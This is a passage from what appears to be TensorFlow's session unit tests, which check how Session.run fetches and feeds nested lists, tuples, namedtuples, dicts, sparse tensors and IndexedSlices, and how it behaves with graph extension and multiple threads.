v6 = np.float64(-23.451)
arr1 = np.array([1.2, 6.7, 3.4])
arr2 = np.array([7, 11, 3])
sample = SampleAttr(
SampleAttr(
SampleAttr(constant_op.constant(v1), constant_op.constant(v2)),
SampleAttr(constant_op.constant(arr1), constant_op.constant(arr2))),
{'A': SampleAttr(constant_op.constant(v3), constant_op.constant(v4)),
'B': [SampleAttr(constant_op.constant(v5), constant_op.constant(v6))]})
with session.Session() as sess:
result = sess.run(sample)
self.assertIsInstance(result, SampleAttr)
self.assertIsInstance(result.field0, SampleAttr)
self.assertIsInstance(result.field0.field0, SampleAttr)
self.assertIsInstance(result.field0.field1, SampleAttr)
self.assertIsInstance(result.field0.field1.field0, np.ndarray)
self.assertAllEqual(arr1, result.field0.field1.field0)
self.assertIsInstance(result.field0.field1.field1, np.ndarray)
self.assertAllEqual(arr2, result.field0.field1.field1)
self.assertIsInstance(result.field1, dict)
self.assertIn('A', result.field1)
self.assertIn('B', result.field1)
self.assertIsInstance(result.field1['A'], SampleAttr)
self.assertAllEqual(
[v3, v4],
[result.field1['A'].field0, result.field1['A'].field1])
self.assertIsInstance(result.field1['B'], list)
self.assertEqual(1, len(result.field1['B']))
self.assertIsInstance(result.field1['B'][0], SampleAttr)
self.assertAllEqual(
[v5, v6],
[result.field1['B'][0].field0, result.field1['B'][0].field1])
def testFetchNestingEmptyOneLevel(self):
with session.Session() as sess:
a_val = 11.0
a = constant_op.constant(a_val)
res = sess.run([[], tuple(), {}])
self.assertTrue(isinstance(res, list))
self.assertEqual(3, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(0, len(res[0]))
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(0, len(res[1]))
self.assertTrue(isinstance(res[2], dict))
self.assertEqual(0, len(res[2]))
res = sess.run([[], tuple(), {}, a])
self.assertTrue(isinstance(res, list))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(0, len(res[0]))
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(0, len(res[1]))
self.assertTrue(isinstance(res[2], dict))
self.assertEqual(0, len(res[2]))
self.assertEqual(a_val, res[3])
def testFetchNestingOneLevel(self):
with session.Session() as sess:
# pylint: disable=invalid-name
ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
DEFG = collections.namedtuple('DEFG', ['d', 'e', 'f', 'g'])
# pylint: enable=invalid-name
a_val = 42.0
b_val = None
c_val = 44.0
a = constant_op.constant(a_val)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(c_val)
# List of lists, tuples, namedtuple, and dict
res = sess.run([[a, b, c], (a, b, c),
ABC(a=a, b=b, c=c), {
'a': a.name,
'c': c,
'b': b
}])
self.assertTrue(isinstance(res, list))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(3, len(res[0]))
self.assertEqual(a_val, res[0][0])
self.assertEqual(b_val, res[0][1])
self.assertEqual(c_val, res[0][2])
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(3, len(res[1]))
self.assertEqual(a_val, res[1][0])
self.assertEqual(b_val, res[1][1])
self.assertEqual(c_val, res[1][2])
self.assertTrue(isinstance(res[2], ABC))
self.assertEqual(a_val, res[2].a)
self.assertEqual(b_val, res[2].b)
self.assertEqual(c_val, res[2].c)
self.assertTrue(isinstance(res[3], dict))
self.assertEqual(3, len(res[3]))
self.assertEqual(a_val, res[3]['a'])
self.assertEqual(b_val, res[3]['b'])
self.assertEqual(c_val, res[3]['c'])
# Tuple of lists, tuples, namedtuple, and dict
res = sess.run(([a, b, c], (a.name, b, c), ABC(a=a, b=b, c=c), {
'a': a,
'c': c,
'b': b
}))
self.assertTrue(isinstance(res, tuple))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(3, len(res[0]))
self.assertEqual(a_val, res[0][0])
self.assertEqual(b_val, res[0][1])
self.assertEqual(c_val, res[0][2])
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(3, len(res[1]))
self.assertEqual(a_val, res[1][0])
self.assertEqual(b_val, res[1][1])
self.assertEqual(c_val, res[1][2])
self.assertTrue(isinstance(res[2], ABC))
self.assertEqual(a_val, res[2].a)
self.assertEqual(b_val, res[2].b)
self.assertEqual(c_val, res[2].c)
self.assertTrue(isinstance(res[3], dict))
self.assertEqual(3, len(res[3]))
self.assertEqual(a_val, res[3]['a'])
self.assertEqual(b_val, res[3]['b'])
self.assertEqual(c_val, res[3]['c'])
# Namedtuple of lists, tuples, namedtuples, and dict
res = sess.run(
DEFG(
d=[a, b, c],
e=(a, b, c),
f=ABC(a=a.name, b=b, c=c),
g={
'a': a,
'c': c,
'b': b
}))
self.assertTrue(isinstance(res, DEFG))
self.assertTrue(isinstance(res.d, list))
self.assertEqual(3, len(res.d))
self.assertEqual(a_val, res.d[0])
self.assertEqual(b_val, res.d[1])
self.assertEqual(c_val, res.d[2])
self.assertTrue(isinstance(res.e, tuple))
self.assertEqual(3, len(res.e))
self.assertEqual(a_val, res.e[0])
self.assertEqual(b_val, res.e[1])
self.assertEqual(c_val, res.e[2])
self.assertTrue(isinstance(res.f, ABC))
self.assertEqual(a_val, res.f.a)
self.assertEqual(b_val, res.f.b)
self.assertEqual(c_val, res.f.c)
self.assertTrue(isinstance(res.g, dict))
self.assertEqual(3, len(res.g))
self.assertEqual(a_val, res.g['a'])
self.assertEqual(b_val, res.g['b'])
self.assertEqual(c_val, res.g['c'])
# Dict of lists, tuples, namedtuples, and dict
res = sess.run({
'd': [a, b, c],
'e': (a, b, c),
'f': ABC(a=a, b=b, c=c),
'g': {
'a': a.name,
'c': c,
'b': b
}
})
self.assertTrue(isinstance(res, dict))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res['d'], list))
self.assertEqual(3, len(res['d']))
self.assertEqual(a_val, res['d'][0])
self.assertEqual(b_val, res['d'][1])
self.assertEqual(c_val, res['d'][2])
self.assertTrue(isinstance(res['e'], tuple))
self.assertEqual(3, len(res['e']))
self.assertEqual(a_val, res['e'][0])
self.assertEqual(b_val, res['e'][1])
self.assertEqual(c_val, res['e'][2])
self.assertTrue(isinstance(res['f'], ABC))
self.assertEqual(a_val, res['f'].a)
self.assertEqual(b_val, res['f'].b)
self.assertEqual(c_val, res['f'].c)
self.assertTrue(isinstance(res['g'], dict))
self.assertEqual(3, len(res['g']))
self.assertEqual(a_val, res['g']['a'])
self.assertEqual(b_val, res['g']['b'])
self.assertEqual(c_val, res['g']['c'])
def testFetchTensorObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
results_with_list = s.run([c])
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_list[0])
results_with_single = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_single)
results_with_get = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_get)
a_val, b_val = s.run([a, b]) # Test multiple fetches.
self.assertAllEqual([[1.0, 1.0]], a_val)
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], b_val)
results_with_dict = s.run({'a': [a], 'b': b, 'z': [a, b]})
self.assertAllEqual([[1.0, 1.0]], results_with_dict['a'][0])
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
results_with_dict['b'])
self.assertAllEqual(results_with_dict['a'][0], results_with_dict['z'][0])
self.assertAllEqual(results_with_dict['b'], results_with_dict['z'][1])
# Test nested structures
results_with_nested_list = s.run([[[a, b], b], a, [a, b]])
self.assertAllEqual([[1.0, 1.0]], results_with_nested_list[0][0][0])
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
results_with_nested_list[0][0][1])
self.assertAllEqual(results_with_nested_list[0][0][0],
results_with_nested_list[1])
self.assertAllEqual(results_with_nested_list[1],
results_with_nested_list[2][0])
self.assertAllEqual(results_with_nested_list[0][0][1],
results_with_nested_list[0][1])
self.assertAllEqual(results_with_nested_list[0][1],
results_with_nested_list[2][1])
def testFetchScalar(self):
with session.Session() as s:
for scalar in np.int32, np.int64, np.float16, np.float32, np.float64:
x = scalar(7)
y = scalar(8)
tf_x = constant_op.constant(x, shape=[])
tf_y = constant_op.constant(y)
tf_xy = math_ops.add(tf_x, tf_y)
# Single fetch
xy = s.run(tf_xy)
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# List fetch
xy, = s.run([tf_xy])
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# Dict fetch
xy = s.run({'xy': tf_xy})['xy']
self.assertEqual(scalar, type(xy))
self.assertEqual(x + y, xy)
# Nested list fetch
xy = s.run([[[tf_xy]], tf_xy, [tf_xy]])
self.assertAllEqual(xy, [[[x + y]], x + y, [x + y]])
self.assertEqual(scalar, type(xy[0][0][0]))
self.assertEqual(scalar, type(xy[1]))
self.assertEqual(scalar, type(xy[2][0]))
def testFetchOperationObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
v = variables.Variable(a, name='testFetchOperationObject_v')
s.run(v.initializer)
v_val = s.run(v)
self.assertAllEqual([[1.0, 1.0]], v_val)
def testFetchSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = sparse_tensor.SparseTensor(
constant_op.constant(indices), constant_op.constant(values),
constant_op.constant(shape))
# Single fetch, use as tuple
sp_out = s.run(sp)
indices_out, values_out, shape_out = sp_out
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Single fetch, use as SparseTensorValue
sp_out = s.run(sp)
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Tuple fetch, use as tuple
indices_out, values_out, shape_out = s.run(sp)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as tuple
(indices_out, values_out, shape_out), = s.run([sp])
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as SparseTensorValue
sp_out, = s.run([sp])
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Dict fetch (single value), use as tuple
indices_out, values_out, shape_out = s.run({'sp': sp})['sp']
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Dict fetch (list value), use as tuple
(indices_out, values_out, shape_out), = s.run({'sp': [sp]})['sp']
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Dict fetch, use as SparseTensorValue
sp_out = s.run({'sp': sp})['sp']
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Nested list fetch use as tuple
sp_out = s.run([[[sp]], sp])
indices_out, values_out, shape_out = sp_out[0][0][0]
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
indices_out, values_out, shape_out = sp_out[1]
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Nested list fetch, use as SparseTensorValue
sp_out = s.run([[[sp]], sp])
self.assertAllEqual(sp_out[0][0][0].indices, indices)
self.assertAllEqual(sp_out[0][0][0].values, values)
self.assertAllEqual(sp_out[0][0][0].dense_shape, shape)
self.assertAllEqual(sp_out[1].indices, indices)
self.assertAllEqual(sp_out[1].values, values)
self.assertAllEqual(sp_out[1].dense_shape, shape)
def testFeedSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = sparse_tensor.SparseTensor(
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),
)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with tuple, fetch sp directly
sp_out = s.run(sp, {sp: (indices, values, shape)})
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
# Feed SparseTensorValue and fetch sp directly.
sp_out = s.run(sp, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
def testFeedSparsePlaceholder(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(dtype=np.float32, name='placeholder1')
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
def testFeedSparsePlaceholderPartialShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(
shape=[None, 9, 2], dtype=np.float32, name='placeholder1')
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
def testFeedSparsePlaceholderConstantShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(
dtype=np.float32, shape=shape, name='placeholder1')
self.assertAllEqual(sp.dense_shape.eval(session=s), shape)
self.assertAllEqual(tensor_util.constant_value(sp.dense_shape), shape)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
def testFetchIndexedSlices(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices),
constant_op.constant(dense_shape))
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlices(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),
)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind_dense_shape = array_ops.identity(ind.dense_shape)
ind2 = ops.IndexedSlices(ind_values, ind_indices, ind_dense_shape)
# Feed with tuple
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape], {
ind: (values, indices, dense_shape)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape], {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testFetchIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = None
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices), None)
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = None
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(2, 3)), None)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind2 = ops.IndexedSlices(ind_values, ind_indices)
# Feed with tuple
values_out, indices_out = s.run([ind_values, ind_indices], {
ind: (values, indices)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue
values_out, indices_out = s.run([ind_values, ind_indices], {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testExtendWithStatelessOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
# Extend will happen here.
e_val = s.run(e)
self.assertAllEqual([[24.0]], e_val)
def testExtendWithStatefulOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testExtendWithStatefulOperations_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
# Extend will happen here.
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
def testExtendWithGroupBy(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
p = variables.Variable(a, name='testExtendWithGroupBy_p')
a_val = a.eval() # Force an Extend after this op.
self.assertAllEqual([[1.0, 1.0]], a_val)
b = constant_op.constant(2.0, shape=[1, 2])
q = variables.Variable(b, name='testExtendWithGroupBy_q')
# Extend will happen here.
init = control_flow_ops.group(p.initializer, q.initializer)
s.run(init)
p_val, q_val = s.run([p, q])
self.assertAllEqual([[1.0, 1.0]], p_val)
self.assertAllEqual([[2.0, 2.0]], q_val)
def testTensorGetMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
fed_c_val = c.eval(feed_dict={a.name: [[4.0, 4.0]]})
self.assertAllEqual([[16.0, 16.0, 16.0]], fed_c_val)
@test_util.run_v1_only('b/120545219')
def testOperationRunMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 2], name='b')
v = variables.VariableV1(a, a.dtype)
assign_a_to_v = state_ops.assign(v, a)
assign_a_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[1.0, 1.0]], v_val)
assign_b_to_v = state_ops.assign(v, b)
assign_b_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[2.0, 2.0]], v_val)
assign_b_to_v.eval(feed_dict={'b:0': [[3.0, 3.0]]})
v_val = v.eval()
self.assertAllEqual([[3.0, 3.0]], v_val)
def testDefaultGraph(self):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
self.assertEqual(ops.get_default_graph(), a.graph)
self.assertEqual(ops.get_default_graph(), b.graph)
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testDefaultGraph_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def _testDefaultGraphInThread(self, constructed_event, continue_event, i):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='var_%d' % i)
# Block here until all threads have constructed their graph.
constructed_event.set()
continue_event.wait()
assign_c_to_v = state_ops.assign(v, c)
v.initializer.run()
assign_c_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def testDefaultGraphWithThreads(self):
# Fork ten threads that use their thread-local default graph.
threads = []
constructed_events = [threading.Event() for _ in range(10)]
continue_event = threading.Event()
for i, constructed_event in enumerate(constructed_events):
t = self.checkedThread(
target=self._testDefaultGraphInThread,
args=(constructed_event, continue_event, i))
threads.append(t)
for t in threads:
t.start()
for constructed_event in constructed_events:
constructed_event.wait()
continue_event.set()
for t in threads:
t.join()
def testParallelRun(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
ev = threading.Event()
def run_step():
ev.wait()
val = c.eval(session=sess)
self.assertEqual(val, 5.0)
threads = [self.checkedThread(target=run_step) for _ in range(100)]
for t in threads:
t.start()
ev.set()
for t in threads:
t.join()
@staticmethod
def _build_graph():
time.sleep(random.random() * 0.1)
# Do some graph construction. Try to exercise non-trivial paths.
graph = ops.get_default_graph()
gdef = None
for _ in range(10):
x = array_ops.placeholder(dtype=dtypes.float32)
with ops.colocate_with(x):
y = array_ops.placeholder(dtype=dtypes.float32)
with ops.device('/cpu:0'):
z = control_flow_ops.while_loop(
lambda x, y: x < 10, lambda x, y: (x + 1, x * y), [x, y])
with graph._attr_scope({'_a': attr_value_pb2.AttrValue(b=False)}):
gradients_impl.gradients(z, [x, y])
if gdef is None:
gdef = graph.as_graph_def()
else:
importer.import_graph_def(gdef, name='import')
@test_util.run_v1_only('b/120545219')
def testParallelRunAndSingleBuild(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
stop = threading.Event()
def run_loop():
while not stop.is_set():
time.sleep(random.random() * 0.1)
self.assertEqual(sess.run(c), 5.0)
threads = [self.checkedThread(target=run_loop) for _ in range(10)]
for t in threads:
t.start()
SessionTest._build_graph()
stop.set()
for t in threads:
t.join()
@test_util.run_v1_only('b/120545219')
def testParallelRunAndParallelBuild(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
stop = threading.Event()
def run_loop():
while not stop.is_set():
time.sleep(random.random() * 0.1)
self.assertEqual(sess.run(c), 5.0)
run_threads = [self.checkedThread(target=run_loop) for _ in range(10)]
for t in run_threads:
t.start()
build_threads = [self.checkedThread(target=SessionTest._build_graph)
for _ in range(10)]
for t in build_threads:
t.start()
for t in build_threads:
t.join()
# Let the run_threads run until the build threads are finished.
stop.set()
for t in run_threads:
t.join()
def testRunFeedDict(self):
with session.Session() as s:
x = array_ops.zeros([2])
y = s.run(2 * x, feed_dict={x: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
